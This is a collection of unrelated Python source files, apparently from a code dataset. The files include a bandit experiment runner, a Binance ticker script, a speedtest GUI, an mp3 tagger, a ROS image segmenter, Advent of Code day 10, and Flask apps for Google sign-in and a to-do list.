    sys.exit(0)
if __name__ == '__main__':
    # Parse experiment options, build the bandit algorithm, run it, and
    # persist the per-step losses/choices for later plotting.
    ap = argparse.ArgumentParser()
    ap.add_argument('-ho', '--horizon', default=5000,
                        type=int, help="how long to run the experiment")
    ap.add_argument('-n', '--N', default=1,
                        type=int, help="how many food items in the plate")
    ap.add_argument('-a', '--algo', default="greedy",
                        type=str, help="which bandit algorithm to run")
    ap.add_argument('-alp', '--alpha', default=0.05,
                        type=float, help="alpha for LinUCB")
    ap.add_argument('-ga', '--gamma',default=1000,
                        type=float, help="gamma for singleUCB")
    ap.add_argument('-eps', '--epsilon',default=0,
                        type=float, help="epsilon for epsilon-greedy")
    ap.add_argument('-g', '--gpu', default='0', type=str, help="GPU ID")
    args = ap.parse_args()
    os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
    # Initialize ContextualBanditAlgo; the algo name is extended with its
    # hyper-parameters so the output filename is self-describing.
    if args.algo == "greedy":
        algo = ContextualBanditAlgo(N=args.N)
    elif args.algo == "epsilon":
        # 1 Nov 2019: Change epsilon from input to args
        algo = epsilonGreedy(N=args.N, epsilon=args.epsilon)
        args.algo += "_e_" + str(args.epsilon)
    elif args.algo == "singleUCB":
        algo = singleUCB(N=args.N, alpha=args.alpha, gamma=args.gamma)
        args.algo += "_alpha_" + str(args.alpha) + "_gamma_" + str(args.gamma)
    elif args.algo == "multiUCB":
        algo = multiUCB(N=args.N)
    elif args.algo == "UCB":
        delta = float(input("Set delta: "))
        algo = MultiArmedUCB(N=args.N, T=args.horizon, delta=delta)
        args.algo += "_delta_" + str(delta)
    else:
        # BUGFIX: an unrecognized --algo previously left `algo` undefined and
        # crashed later with a NameError; fail fast with a usage error.
        ap.error("unknown --algo: {}".format(args.algo))
    # Initialize Environment and install the SIGINT feature-dump handler.
    envir = Environment(args.N)
    signal.signal(signal.SIGINT, signal_handler)
    # Run Environment using args.horizon
    start = time.time()
    cost_algo, cost_spanet, pi_star_choice_hist, pi_choice_hist, expected_srs, loss_list, pi_star_loss = envir.run(
        algo, args.horizon, time=time, time_prev=start)
    end = time.time()
    print("Time taken: ", end - start)
    print("pi loss is: ", np.round(cost_algo, 2))
    print()
    print("Cumulative loss is: ", np.sum(cost_algo))
    previous_dir = os.getcwd()
    result_dir = os.path.join(previous_dir, "results")
    output_file_name = args.algo + "_l_" + str(LAMB_DEFAULT) + "_f_" + str(NUM_FEATURES) + "_wo_banana.npz"
    output_file_name = os.path.join(result_dir, output_file_name)
    print("Saved output file to ", output_file_name)
    np.savez(output_file_name,
             pi_loss=np.array(cost_algo),
             pi_choice_hist=np.array(pi_choice_hist),
             pi_star_choice_hist=np.array(pi_star_choice_hist),
             pi_star_loss=np.array(pi_star_loss))
| StarcoderdataPython |
3275581 | <gh_stars>1-10
from binance.client import Client
import Settings
import json
# Fetch all Binance tickers, keep BTC-related pairs, and map their short
# symbols to full currency names for use by the twitter bot.
api_key = Settings.BINANCE_API_KEY
api_secret = Settings.BINANCE_API_SECRET
client = Client(api_key, api_secret)
# I didn't know this endpoint existed, will use this endpoint next time.
# print(client.get_products())
# get all symbol prices
prices = client.get_all_tickers()
listBtc = []
# Filtering out results that don't contain BTC
# NOTE(review): this matches 'btc' anywhere in the symbol (e.g. BTCUSDT),
# not only pairs quoted in BTC -- confirm that is intended.
for eachPrice in prices:
    if 'btc' in eachPrice['symbol'].lower():
        listBtc.append(eachPrice['symbol'])
        print(eachPrice['symbol'])
print(listBtc)
# This list will contain all the tickers without the tracker suffix of BTC
# NOTE(review): stripping the last 3 chars assumes the symbol *ends* with
# 'BTC'; for symbols where BTC is the base (BTCUSDT) this cuts 'SDT'.
list_without_btc = []
for eachTicker in listBtc:
    eachNewTicker = eachTicker[:-3]
    list_without_btc.append(eachNewTicker)
print(list_without_btc)
# This file contains a list of almost all known currencies, pulled from github
allCurrencies = json.loads(open('cryptocurrencies.json').read())
# Data object will hold a key value pair of each tracker
# Key will be the shorthand ticker, value will hold the full name
# { BTC : 'Bitcoin'}
data = {}
for eachTicker in list_without_btc:
    for eachCurrency in allCurrencies:
        if eachCurrency == eachTicker:
            data[eachTicker] = allCurrencies[eachCurrency]
            continue
json_data = json.dumps(data)
print(json_data)
# Dump all this data into a file, so that it can be used by the twitter main.py script
with open('data.json', 'w') as outfile:
    json.dump(data, outfile)
| StarcoderdataPython |
1655501 | <reponame>newtoallofthis123/PythonProjects
# Name of the Project : IJ-Speed.py
# Written by NoobScience : https://github.com/newtoallofthis123
# Modules Used : imdb (pip install speedtest)
# import the module as st
import speedtest as st
import tkinter as tk
from tkinter import *
def speedtest():
    """Run a bandwidth test and print download/upload speeds and ping.

    Reads the module-global Tkinter StringVars ``dwn`` and ``upl`` created
    in ``__main__``.
    """
    # defining
    stn = st.Speedtest()
    # Get upload and download
    # NOTE(review): speedtest's Speedtest.download()/upload() take an
    # optional *callback*, not a URL string -- passing dwn.get()/upl.get()
    # here looks wrong and likely raises during the transfer; verify
    # against the installed speedtest library version.
    download = stn.download(dwn.get())
    upload = stn.upload(upl.get())
    #printing download and upload speeds (bits per second)
    print(download)
    print(upload)
    # Get Servers (empty list = pick the best servers automatically)
    stn.get_servers([])
    # Get Ping for the Servers
    ping = stn.results.ping
    # Print ping (milliseconds)
    print(ping)
if __name__=="__main__":
    # Build the minimal Tkinter UI: a title label, a URL entry bound to
    # `dwn`, and a button that triggers the speedtest() function above.
    gui = tk.Tk()
    gui.title("IJ-Speed")
    gui.geometry("300x300")
    gui.configure(bg="black")
    dwn = StringVar()
    upl = StringVar()
    # NOTE(review): `upl` is never wired to a widget, so upl.get() in
    # speedtest() always returns "" -- confirm intended.
    label = tk.Label(
        gui,
        text = "IJ Speed Test",
        font=("Arial", 36),
        bg="black",
        fg="red",
        ).pack(fill=tk.X, pady=2)
    entry = tk.Entry(
        gui,
        textvariable=dwn, width =100).pack(pady=5)
    button = tk.Button(
        gui,
        text = "Give URL",
        font=("Arial", 18),
        bg="yellow",
        fg="black",
        command =speedtest,).pack(pady=2)
| StarcoderdataPython |
64230 | <filename>scripts/tag_mp3.py
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import argparse
import json
from mutagen.id3 import ID3, TDRL, COMM
from pathlib import Path
from pprint import pprint
# Copy selected fields from a vgmdb JSON dump into the ID3 tags of every
# .mp3 in a directory (release date -> TDRL, comment -> COMM).
parser = argparse.ArgumentParser(description="tag mp3 using vgmdb -J")
parser.add_argument("dir", help='dir of mp3')
parser.add_argument("json", help='json from vgmdb -J')
parser.add_argument(
    "-r",
    help='release_date only',
    action='store_true',
    dest='release_date_only')
args = parser.parse_args()
# args = argparse.Namespace(dir="/Users/bilalh/aa", json="/Users/bilalh/aa/n.json")
# pprint(args)
data = json.load(Path(args.json).expanduser().open())
# Only these JSON keys are ever written to the tags.
allowed = {"comment", "release_date"}
pprint(data)
for fp in Path(args.dir).expanduser().glob("*.mp3"):
    print("Processing {}".format(fp))
    cur = ID3(filename=str(fp), v2_version=3)
    cur.update_to_v23()
    for key_json in allowed:
        # With -r, skip everything except the release date.
        if args.release_date_only and key_json != 'release_date':
            continue
        try:
            value = data[key_json]
            if value is not None:
                print("Setting {}={}".format(key_json, value))
                if key_json == "release_date":
                    # vgmdb uses DD.MM.YYYY; TDRL wants YYYY-MM-DD.
                    arr = reversed(value.split('.'))
                    val2 = "-".join(arr)
                    cur.delall('TDRL')
                    cur.add(TDRL(encoding=3, text=[val2]))
                elif key_json == "comment":
                    # Remove all existing comment frames before writing.
                    cur.delall('COMM')
                    cur.delall('COMM::ENG')
                    cur.delall('COMM::XXX')
                    cur.add(
                        COMM(encoding=3, lang='eng', desc='', text=[value]))
        except KeyError as e:
            # Key absent from the vgmdb dump: nothing to tag.
            pass
    cur.save()
| StarcoderdataPython |
1652887 | <reponame>BhargavRE25/Rover-Machine-Learning
#!/usr/bin/env python
# Converts laser scan to planar distance
# and segments into obstalces and just hills
import rospy
from std_msgs.msg import Header
from sensor_msgs.msg import LaserScan, Imu, Image
from tf.transformations import euler_from_quaternion
from cv_bridge import CvBridge, CvBridgeError
import cv2
from copy import deepcopy
import math
import scipy.stats
import numpy as np
def to_hsv(img):
    """Convert an RGB image (numpy array) to HSV color space via OpenCV."""
    return cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
class ObjectDetector:
    """Handles the logic of detecting the cubesat, the base, and the base front.

    All detect_* methods take an HSV image and return a uint8 mask
    (non-zero = detected); segment() combines them into one labeled mask.
    """
    # color that ALWAYS occurs in a base connected component and
    # NEVER occurs in a cubesat or rover connected component
    def __init__(self):
        pass
    # HSV (low, high) range of the base "key" color used to tell the base
    # apart from cubesat/rover components.
    base_key = ((5, 100, 100), (15, 255, 255))
    # color range of base, cubesat and rover
    object_ranges = [
        ((10, 25, 70), (60, 255, 255))
    ]
    # Base Front Color Range
    front_ranges = [
        ((75, 50, 50), (150, 255, 255))
    ]
    def segment(self, hsv_img):
        # Combine per-object masks into one label image:
        # base=100, base front=150, cubesat=50.
        # NOTE(review): rover pixels are set to 00 (zero), so detect_rover
        # contributes nothing to the sum, and it is identical to
        # detect_cubesat below -- confirm the intended rover label value.
        base_mask = self.detect_base(hsv_img)
        base_mask[base_mask > 0] = 100
        base_front_mask = self.detect_base_front(hsv_img)
        base_front_mask[base_front_mask > 0] = 150
        cubesat_mask = self.detect_cubesat(hsv_img)
        cubesat_mask[cubesat_mask > 0] = 50
        rover_mask = self.detect_rover(hsv_img)
        rover_mask[rover_mask > 0] = 00
        return base_mask + base_front_mask + cubesat_mask + rover_mask
    def detect_base(self, hsv_img):
        # Base = object-colored component that DOES contain the key color.
        mask = self.comp_mask(hsv_img, self.object_ranges, self.base_key, inverse_key=False)
        return mask
    def detect_base_front(self, hsv_img):
        # Base front = front-colored component that is not too wide.
        mask = self.comp_mask(hsv_img, self.front_ranges, max_width_height_ratio=2)
        return mask
    def detect_cubesat(self, hsv_img):
        # Cubesat = object-colored component WITHOUT the base key color.
        mask = self.comp_mask(hsv_img, self.object_ranges, self.base_key, inverse_key=True)
        return mask
    def detect_rover(self, hsv_img):
        # NOTE(review): identical to detect_cubesat -- presumably the rover
        # needs its own key/ranges; verify.
        mask = self.comp_mask(hsv_img, self.object_ranges, self.base_key, inverse_key=True)
        return mask
    def comp_mask(self, hsv_img, ranges, key=None, inverse_key=False, max_width_height_ratio=None):
        """Build a binary mask of pixels in *ranges*, then prune components:
        tiny outliers, components lacking (or having, if inverse_key) the
        *key* color, and components wider than *max_width_height_ratio*.
        """
        mask = None
        for r in ranges:
            new_mask = cv2.inRange(hsv_img, r[0], r[1])
            if mask is None:
                mask = new_mask
            else:
                mask = cv2.bitwise_or(mask, new_mask)
        # now grow mask to encompass some background and connect things up
        kernel = np.ones((3, 3))
        mask = cv2.dilate(mask, kernel, iterations=4)
        # now remove mask elements of outlier low pixels
        connected_comps = cv2.connectedComponentsWithStats(mask, 8)
        if connected_comps[0] == 1: # only background detected (i.e. no component)
            return mask # return early
        labels = connected_comps[1]
        # stats column 4 is the pixel count of each component.
        pixel_counts = [i[4] for i in connected_comps[2][1:]]
        avg_pixel_count = np.mean([max(pixel_counts), np.mean(pixel_counts)])
        min_count = min(pixel_counts)
        if avg_pixel_count / min_count < 4: # no indication of "too small bits"
            threshold = 0
        else:
            threshold = min_count + (5 if (avg_pixel_count - min_count) / 4 < 5 else (avg_pixel_count - min_count) / 4)
        for idx, stats in enumerate(connected_comps[2]):
            if stats[4] < threshold:
                # Zero out this too-small component from the mask.
                out_mask = np.array(labels, dtype=np.uint8)
                out_mask[labels == idx] = 0.0
                out_mask[labels != idx] = 1.0
                mask = cv2.bitwise_and(mask, out_mask)
        # Now strip any connected components that don't have key color if key is specified
        if key is not None or max_width_height_ratio is not None:
            conn_comps = cv2.connectedComponentsWithStats(mask, 8)
            labels = conn_comps[1]
            # print('Pre-cut # comps:', conn_comps[0] - 1)
            for lab in range(1, conn_comps[0]):
                do_cut = False
                out_mask = np.array(labels, dtype=np.uint8)
                out_mask[labels == lab] = 1
                out_mask[labels != lab] = 0
                if key is not None:
                    # Does this component contain any key-colored pixel?
                    cropped = cv2.bitwise_and(hsv_img, hsv_img, mask=out_mask)
                    new_mask = cv2.inRange(cropped, key[0], key[1])
                    no_match = np.all(new_mask == 0)
                    do_cut = do_cut or ((no_match and not inverse_key) or (not no_match and inverse_key))
                if max_width_height_ratio is not None:
                    _, _, width, height, _ = conn_comps[2][lab]
                    if (width / height) > max_width_height_ratio:
                        do_cut = True
                if do_cut: # colors that should or shouldn't be there
                    cutout = np.array(out_mask)
                    cutout[out_mask == 0] = 1
                    cutout[out_mask > 0] = 0
                    mask = cv2.bitwise_and(mask, mask, mask=cutout) # cut out this component
        comps = cv2.connectedComponentsWithStats(mask, 8)
        # print('Final # connected components:', comps[0] - 1)
        return mask
class ImageSegmenter:
    """ Takes in stereo camera depth image and produces estimates of detected
    obstacles
    """
    def __init__(self):
        # ROS node setup: subscribe to the rectified color image and
        # publish the labeled segmentation mask. Blocks in rospy.spin().
        rospy.init_node("image_segmenter")
        # TODO: remove hard coded constant
        self.NUM_BUCKETS = 4
        self.bridge = CvBridge()
        self.detector = ObjectDetector()
        img_topic = rospy.get_param('~image_topic', '/stereo/image_proc_right/image_rect_color')
        # NOTE(review): this reads the same '~image_topic' param as above --
        # likely meant '~depth_image_topic'; verify.
        depth_img_topic = rospy.get_param('~image_topic', '/stereo/image_proc_right/image_rect_color')
        pub_topic = rospy.get_param('~tagged_image_topic', '/segmented_image')
        # subscriber and publishers
        self.image_mask_pub = rospy.Publisher(pub_topic, Image, queue_size=4)
        rospy.Subscriber(img_topic, Image, callback=self.segment_callback)
        # rospy.Subscriber(depth_img_topic, Image, callback=self.depth_callback)
        rospy.spin()
    def segment_callback(self, data):
        # Convert ROS image -> OpenCV, run the detector, publish the mask.
        img = self.bridge.imgmsg_to_cv2(data, "passthrough")
        hsv_img = to_hsv(img)
        segmented_frame = self.detector.segment(hsv_img)
        try:
            self.image_mask_pub.publish(self.bridge.cv2_to_imgmsg(segmented_frame, "mono8"))
        except CvBridgeError as e:
            print(e)
    def depth_callback(self, data):
        # Bucket valid depth readings by viewing angle.
        # NOTE(review): currently unused (subscription commented out);
        # _idx_to_degree/_deg_to_bucket are not defined on this class, so
        # enabling it as-is would raise AttributeError. `buckets` is also
        # never consumed -- confirm intended behavior before re-enabling.
        img = self.bridge.imgmsg_to_cv2(data, "32FC1")
        depths = np.array(img, dtype=np.float32)
        width = len(depths[0])
        buckets = [[] for i in range(self.NUM_BUCKETS)]
        for row in depths:
            for i, val in enumerate(row):
                if not np.isnan(val):
                    deg = self._idx_to_degree(i, len(depths[0]))
                    idx = self._deg_to_bucket(deg, self.NUM_BUCKETS)
                    buckets[idx].append(val)
if __name__ == "__main__":
ImageSegmenter()
| StarcoderdataPython |
3207293 | import unittest
from otri.filtering.filters.generic_filter import GenericFilter
from otri.filtering.stream import Stream
def EXAMPLE_OP(x):
    """Reference operation used by the filter tests: increment by one."""
    return x + 1
class GenericFilterTest(unittest.TestCase):
    # Unit tests for GenericFilter: applying an operation to a stream.
    def setUp(self):
        # Fresh input/output streams and a filter wired A -> B.
        # NOTE(review): s_A created here is replaced inside the test below,
        # so this particular assignment is effectively unused.
        self.s_A = Stream()
        self.s_B = Stream()
        self.gen_filter = GenericFilter(
            inputs="A", outputs="B", operation=EXAMPLE_OP)
    def test_simple_stream_applies(self):
        # Testing the method is applied to all the elements of the input stream
        expected = [EXAMPLE_OP(x) for x in range(100)]
        self.s_A = Stream(list(range(100)), is_closed=True)
        self.gen_filter.setup([self.s_A], [self.s_B], None)
        # Drive the filter until it closes the output stream.
        while not self.s_B.is_closed():
            self.gen_filter.execute()
        # Relies on Stream.__eq__ comparing against a plain list.
        self.assertEqual(self.s_B, expected)
| StarcoderdataPython |
1710349 | <filename>tests/test_cli.py
import click.testing
import pytest
from easel.__main__ import cli
from tests.test_configs import TestSites
@pytest.fixture
def runner() -> click.testing.CliRunner:
    """Pytest fixture providing a fresh click CLI test runner per test."""
    return click.testing.CliRunner()
def test__help(runner):
    """Both bare invocation and --help should exit successfully."""
    result_01 = runner.invoke(cli, [])
    result_02 = runner.invoke(cli, ["--help"])
    assert result_01.exit_code == 0
    assert result_02.exit_code == 0
TEST_SITE_VALID = ["--testing", f"--site-root={TestSites.valid}"]
def test__serve(runner):
    """The serve command should succeed under every supported flag combo:
    defaults, --debug, --loglevel, custom host/port, and --watch."""
    default = runner.invoke(
        cli,
        [*TEST_SITE_VALID, "serve"],
    )
    debug = runner.invoke(
        cli,
        [*TEST_SITE_VALID, "--debug", "serve"],
    )
    loglevel = runner.invoke(
        cli,
        [*TEST_SITE_VALID, "--loglevel=DEBUG", "serve"],
    )
    custom = runner.invoke(
        cli,
        [*TEST_SITE_VALID, "serve", "--host=0.0.0.0", "--port=5000"],
    )
    watch = runner.invoke(
        cli,
        [*TEST_SITE_VALID, "serve", "--watch"],
    )
    assert default.exit_code == 0
    assert debug.exit_code == 0
    assert loglevel.exit_code == 0
    assert custom.exit_code == 0
    assert watch.exit_code == 0
def test__rebuild_site_cache(runner):
    """rebuild-site-cache should succeed against the valid test site."""
    result = runner.invoke(
        cli,
        [*TEST_SITE_VALID, "rebuild-site-cache"],
    )
    assert result.exit_code == 0
| StarcoderdataPython |
3317941 | <filename>examples/runners/runners/__main__.py
from surround import Assembler
from .stages import ValidateData, HelloWorld
from .batch_runner import BatchRunner
# pylint: disable=unused-import
from .web_runner import WebRunner
def main():
    """Assemble the example pipeline and run it through the batch runner.

    The web runner variant is kept below (commented out) as an example.
    """
    assembler = Assembler("Default project", ValidateData(), HelloWorld())
    # Example for running batch processing
    BatchRunner(assembler).run()
    # Web Runner example
    # WebRunner(assembler).run()
if __name__ == "__main__":
main()
| StarcoderdataPython |
189169 |
def lprint(msg, *args):
    """Print *msg*, then each extra positional argument on its own line,
    then the closing marker.

    BUGFIX: the original guard ``len(...) > 1`` silently dropped the extra
    arguments when exactly one was supplied. The varargs parameter is also
    renamed so it no longer shadows the builtin ``tuple`` (callers cannot
    pass varargs by keyword, so this is backward compatible).
    """
    print(msg)
    for obj in args:
        print(obj)
    print("结束")
1680516 | <filename>cride/events/models/leagues.py
#Django
from django.db import models
#Utils
from cride.utils.models import BetmatcherModel
class League(BetmatcherModel):
    """A sports league that events belong to (e.g. a national competition)."""
    # Display name of the league.
    name = models.CharField(max_length = 15, blank = False)
    # Owning sport; deleting the sport removes its leagues.
    sport = models.ForeignKey(
        "events.Sport",
        on_delete = models.CASCADE
    )
    # Whether the league is visible in listings.
    show = models.BooleanField(default = True)
    # Featured/"top" flag for prominent placement.
    top = models.BooleanField(default = False)
    # Manual ordering position (nullable = unordered).
    order = models.PositiveIntegerField(null = True)
    # Uploaded league logo.
    image = models.ImageField(
        "league_image",
        blank = False,
    )
    # NOTE(review): free-text image field alongside `image` -- presumably a
    # URL or base64 fallback; confirm which one the frontend uses.
    img = models.TextField(max_length = 500, blank = True)
    def __str__(self):
        return self.name
| StarcoderdataPython |
3231681 | <gh_stars>10-100
import torch
import torch.nn.functional as F
class Optimization():
    """Helpers for continual-learning training: feature-drift weighting and
    knowledge-distillation soft labels."""

    def __init__(self, train_loader, device):
        # Data source and torch device used by the distance computation.
        self.train_loader = train_loader
        self.device = device

    def cdw_feature_distance(self, old_model, old_classifier, new_model):
        """cosine distance weight (cdw): mean cosine distance between the old
        pipeline's outputs and the new model's outputs on one batch.

        Mirrors the original control flow: returns after the *first* batch
        of ``self.train_loader`` (None if the loader is empty).
        """
        old_model = old_model.to(self.device)
        old_classifier = old_classifier.to(self.device)
        for batch in self.train_loader:
            features, _ = batch
            features = features.to(self.device)
            with torch.no_grad():
                reference = old_classifier(old_model(features))
                candidate = new_model(features)
            gap = 1 - torch.cosine_similarity(reference, candidate)
            return torch.mean(gap)

    def kd_generate_soft_label(self, model, data, regularization):
        """knowledge distillation (kd): produce soft labels for *data*,
        optionally L2-normalized along dim 1."""
        soft = model(data)
        return F.normalize(soft, dim=1, p=2) if regularization else soft
| StarcoderdataPython |
1688681 | <reponame>simeydk/adventofcode<gh_stars>0
from typing import List, Union
from statistics import median
def read_file(filename):
    """Return the lines of *filename* with surrounding whitespace stripped."""
    with open(filename) as handle:
        return [line.strip() for line in handle]
PAIRS = { '(': ')', '[': ']', '{': '}', '<': '>',}
OPENS = '([{<'
CLOSES = ')]}>'
POINTS = {
')': 3,
']': 57,
'}': 1197,
'>': 25137,
}
def test_line(string: str) -> Union[str, List[str]]:
stack = []
for char in string:
if char in OPENS:
stack.append(char)
elif char in CLOSES:
expected = PAIRS[stack[-1]]
if char == expected:
stack.pop(-1)
else:
return char
else:
raise Exception('Invalid character')
return stack
def part1(data):
    """Total syntax-error score: sum POINTS for the first bad character of
    every corrupted line (test_line returns a str for those)."""
    total = 0
    for line in data:
        outcome = test_line(line)
        if type(outcome) == str:
            total += POINTS.get(outcome, 0)
    return total
AUTOCOMPLETE_POINTS = {
'(': 1,
'[': 2,
'{': 3,
'<': 4,
}
def calc_autocomplete_score(missing_stack):
    """Score an autocomplete sequence per the day-10 rules.

    The stack of unmatched openers is reversed in place (innermost first,
    preserving the original's mutation of its argument); each opener then
    multiplies the running total by 5 and adds its character value.
    """
    # Constant inlined from module level: opener -> autocomplete value.
    char_values = {'(': 1, '[': 2, '{': 3, '<': 4}
    missing_stack.reverse()
    total = 0
    for opener in missing_stack:
        total = total * 5 + char_values[opener]
    return total
def part2(data):
    """Median autocomplete score over the incomplete (non-corrupted) lines
    (test_line returns a list of unmatched openers for those)."""
    scores = []
    for line in data:
        outcome = test_line(line)
        if type(outcome) == list:
            scores.append(calc_autocomplete_score(outcome))
    return median(scores)
# Worked example from the puzzle statement plus the real puzzle input;
# the asserts double as regression checks for part1/part2.
test_input = [
    R'[({(<(())[]>[[{[]{<()<>>',
    R'[(()[<>])]({[<{<<[]>>(',
    R'{([(<{}[<>[]}>{[]{[(<()>',
    R'(((({<>}<{<{<>}{[]{[]{}',
    R'[[<[([]))<([[{}[[()]]]',
    R'[{[{({}]{}}([{[{{{}}([]',
    R'{<[[]]>}<{[{[{[]{()[[[]',
    R'[<(<(<(<{}))><([]([]()',
    R'<{([([[(<>()){}]>(<<{{',
    R'<{([{{}}[<[[[<>{}]]]>[]]',
]
# NOTE: reads the puzzle input at import time; path is relative to the
# repository root.
input_raw = read_file('2021/data/day10/input.txt')
assert (part1(test_input)) == 26397
print(part1(input_raw))
assert (part2(test_input)) == 288957
print(part2(input_raw))
45904 | #
# This is a minimal server-side web application that authenticates visitors
# using Google Sign-in.
#
# See the README.md and LICENSE.md files for the purpose of this code.
#
# ENVIRONMENT VARIABLES YOU MUST SET
#
# The following values must be provided in environment variables for Google
# Sign-in to work.
#
# These must be registered with, or provided by, the Google Cloud project:
# CLIENT_ID = 'Fill this in'
# CLIENT_SECRET = 'Fill this in'
# REDIRECT_URI = 'Fill this in'
#
# This must be set to a chosen (preferably randomly) value
# SESSION_SECRET = 'Fill this in'
from flask import Flask, redirect, render_template, request, session
import logging
import os
import requests
# Authentication helper libraries
from google.oauth2 import id_token
from google.auth.transport import requests as reqs
app = Flask(__name__)
app.secret_key = os.environ['SESSION_SECRET'].encode() # Must be bytes
@app.route('/')
def homepage():
    """Welcome a signed-in user, or send them to the sign-in page."""
    # If user has signed in (has a valid session), welcome them. Otherwise,
    # direct them to page to start that sign-in and get a valid session.
    if 'email' not in session:
        return redirect('/unauthenticated')
    return render_template('index.html', email=session['email'])
@app.route('/unauthenticated')
def unauthenticated():
    """Render a page whose link starts the Google OAuth2 sign-in flow."""
    # Show a page with a link for the user to sign in with. The link is to a
    # Google sign-in page, and must have the form shown
    url = 'https://accounts.google.com/signin/oauth?response_type=code&'
    url += 'client_id={}&'.format(os.environ['CLIENT_ID'])
    url += 'scope=openid%20email&'
    url += 'redirect_uri={}&'.format(os.environ['REDIRECT_URI'])
    # state is echoed back in the callback and used as the post-login path.
    url += 'state={}&'.format('/') # After sign-in, redirect user to root URL
    return render_template('unauthenticated.html', sign_in_url=url)
@app.route('/privacy')
def privacy_policy():
    """Serve the static privacy-policy page."""
    # Display the privacy policy.
    return render_template('privacy.html')
@app.route('/callback')
def callback():
    """OAuth2 redirect target: exchange the code for an id_token, verify it,
    store the user's email in the session, and redirect onward.

    Returns the error page with HTTP 403 if the token is invalid or lacks
    an email claim.
    """
    # If the user successfully signs in with Google, their browser will be
    # redirected to this page. The redirect URL includes query parameters
    # that can be used to get the user's identity.
    args = request.args.to_dict()
    # NOTE(review): `state` is used as a redirect path but never validated
    # against a stored value (no CSRF check) and is shadowed by the
    # unconditional redirect('/') below -- confirm intended.
    redirect_path = args['state']
    code = args['code']
    # Ask a Google service to provide the user information associated with
    # the code that provided in the redirect URL's query parameter.
    resp = requests.post('https://oauth2.googleapis.com/token', data={
        'code': code,
        'client_id': os.environ['CLIENT_ID'],
        'client_secret': os.environ['CLIENT_SECRET'],
        'redirect_uri': os.environ['REDIRECT_URI'],
        'grant_type': 'authorization_code'
    })
    # Retrieve the id_token field from the JSON response.
    token = resp.json()['id_token']
    # Verify the token's validity (such as proper signature from Google) and
    # extract the email address from it, if possible.
    try:
        info = id_token.verify_oauth2_token(token, reqs.Request())
        if 'email' not in info:
            return render_template('error.html'), 403
        session['email'] = info['email']
    except Exception as e:
        logging.warning('Request has bad OAuth2 id token: {}'.format(e))
        return render_template('error.html'), 403
    # Response will include the session token that now include the email.
    return redirect('/')
# The following is used for local or other non-App Engine deployment
if __name__ == "__main__":
app.run(host='127.0.0.1', port=8080, debug=True) | StarcoderdataPython |
1732544 | <filename>examples/web/wiki/macros/wiki.py
"""Wiki macros"""
from genshi import builder
def title(macro, environ, *args, **kwargs):
    """Return the title of the current page.

    Reads the page name from ``environ["page.name"]`` and wraps it in a
    Genshi builder tag; *macro*, *args* and **kwargs** are part of the wiki
    macro calling convention and are unused here.
    """
    return builder.tag(environ["page.name"])
| StarcoderdataPython |
1613469 | <filename>app/routes.py
#import route libraries
from flask import render_template, request, redirect
from app import app, db
from app.models import Entry
jedi = "of the jedi"
@app.route('/')
@app.route('/index')
def index():
    """Render the main page listing every to-do entry.

    (The previously commented-out hard-coded sample data was removed.)
    """
    entries = Entry.query.all()
    return render_template('index.html', entries=entries)
@app.route('/add', methods=['POST'])
def add():
    """Create a new entry from the submitted form and redirect home.

    BUGFIX: the original guard ``if not title or description:`` parsed as
    ``(not title) or description`` -- it added entries exactly when the
    title was *missing* or a description was present. The intended check
    ("something was actually submitted") is restored below.
    """
    if request.method == 'POST':
        form = request.form
        title = form.get('title')
        description = form.get('description')
        if title or description:
            entry = Entry(title=title, description=description)
            db.session.add(entry)
            db.session.commit()
        return redirect('/')
    return "of the jedi"
@app.route('/update/<int:id>')
def updateRoute(id):
    """Render the edit form for entry *id*, or the fallback string.

    The original guard ``if not id or id != 0:`` was a tautology (true for
    every int) and has been removed; behavior is unchanged. The parameter
    must keep the name ``id`` because Flask passes the ``<int:id>`` URL
    value as a keyword argument.
    """
    entry = Entry.query.get(id)
    if entry:
        return render_template('update.html', entry=entry)
    return "of the jedi"
@app.route('/update', methods=['POST'])
def update():
    """Apply an edit submitted from the update form and redirect home.

    BUGFIX: the previous body was copied from delete() -- it referenced the
    *builtin* ``id`` (there was no parameter or form lookup) and *deleted*
    the entry instead of updating it. It now reads the entry id and the new
    field values from the POSTed form.
    """
    form = request.form
    entry = Entry.query.get(form.get('id'))
    if entry:
        entry.title = form.get('title', entry.title)
        entry.description = form.get('description', entry.description)
        db.session.commit()
        return redirect('/')
    return "of the jedi"
@app.route('/delete/<int:id>')
def delete(id):
    """Delete entry *id* and redirect home (fallback string if missing).

    The tautological guard ``if not id or id != 0:`` was removed; behavior
    is unchanged. ``id`` keeps its name because Flask passes the URL value
    as a keyword argument.
    """
    entry = Entry.query.get(id)
    if entry:
        db.session.delete(entry)
        db.session.commit()
        return redirect('/')
    return "of the jedi"
@app.route('/turn/<int:id>')
def turn(id):
    """Toggle the done/undone status of entry *id* and redirect home.

    The tautological guard ``if not id or id != 0:`` was removed; behavior
    is unchanged. ``id`` keeps its name because Flask passes the URL value
    as a keyword argument.
    """
    entry = Entry.query.get(id)
    if entry:
        entry.status = not entry.status
        db.session.commit()
        return redirect('/')
    return "of the jedi"
# @app.errorhandler(Exception)
# def error_page(e):
# return "of the jedi" | StarcoderdataPython |
142969 | <reponame>RIVeR-Lab/walrus<gh_stars>1-10
from walrus_system_configuration.util import *
from catkin.find_in_workspaces import find_in_workspaces
import sys
import os
from termcolor import colored
SYSINIT_CONFIG_FILE = '/etc/init/rc-sysinit.conf'
def wait_for_net():
    """Return True if rc-sysinit gates boot on static-network-up.

    Scans SYSINIT_CONFIG_FILE for a ``start`` line mentioning
    ``static-network-up``.

    BUGFIX: the file handle was previously opened without ever being
    closed; a ``with`` block now guarantees cleanup, and we return as soon
    as a match is found.
    """
    with open(SYSINIT_CONFIG_FILE) as f:
        for line in f:
            if 'static-network-up' in line and line.strip().startswith('start'):
                return True
    return False
def install():
    """Check the boot configuration and report whether a manual fix is
    needed (this function only warns; it does not edit the file)."""
    if wait_for_net():
        warn("Cannot fix boot without network, you must remove 'and static-network-up' from the start line in " + SYSINIT_CONFIG_FILE)
    else:
        success("Not waiting for network on boot")
def status():
    """Report whether boot currently waits for the network."""
    if wait_for_net():
        warn("Waiting for network on boot")
    else:
        success("Not waiting for network on boot")
| StarcoderdataPython |
50167 | <reponame>NewShadesDAO/api<gh_stars>1-10
from typing import Optional
import requests
from app.config import get_settings
class TenorClient:
    """Thin wrapper around the Tenor v1 GIF API (search and lookup by id).

    NOTE(review): the methods are declared ``async`` but perform *blocking*
    ``requests`` calls, which will stall the event loop -- consider an
